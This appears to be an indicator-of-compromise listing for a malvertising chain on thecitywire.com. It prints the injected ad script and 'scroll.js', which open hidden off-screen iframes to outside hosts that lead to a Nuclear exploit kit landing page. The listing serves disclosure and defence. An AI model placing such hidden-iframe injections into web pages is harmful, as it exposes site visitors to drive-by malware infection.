IOC - www.thecitywire.com

1. Start of malicious redirect: ads1.thecitywire.com/www/delivery/ajs.php?zoneid=106&cb=2792446160&charset=utf-8&loc=http%3A//www.thecitywire.com/node/30992
2.  
3. Injected code:
4.  
5. document.write('<script>var page_object=document.createElement("iframe");page_object.setAttribute("src", "http://productions.WEWANTFOOTBALL.COM/js/scroll.js?ver=1.22.3204");page_object.style.position="absolute";page_object.style.left="-1000px";page_object.style.top="-1000px";page_object.style.width="100";page_object.style.height="100";document.body.appendChild(page_object);/* End Google Ads */</script>');
6.  
7. Content of 'scroll.js':
8.  
9. <html>
10. <body>
11.     <script>
12.         function z() {
13.             var rutin = document.createElement("iframe");
14.             rutin.setAttribute("src", "http://issues.ewomentv.com/e487ce22x97wu.html");
15.             rutin.style.left = "-1250px";
16.             rutin.style.top = "-1250px";
17.             rutin.style.position = "absolute";
18.             rutin.style.width = "140";
19.             rutin.style.height = "100";
20.             document.body.appendChild(rutin);
21.             document.cookie = "nimrod=readed; max-age=32000; path=/"
22.         }
23.         if (document.cookie.indexOf("nimrod") == -1) {
24.             z()
25.         } else {}
26.     </script>
27. </body>
28. </html>
29.  
30. Leads to Nuclear EK landing page:
31. issues.ewomentv.com/e487ce22x97wu.html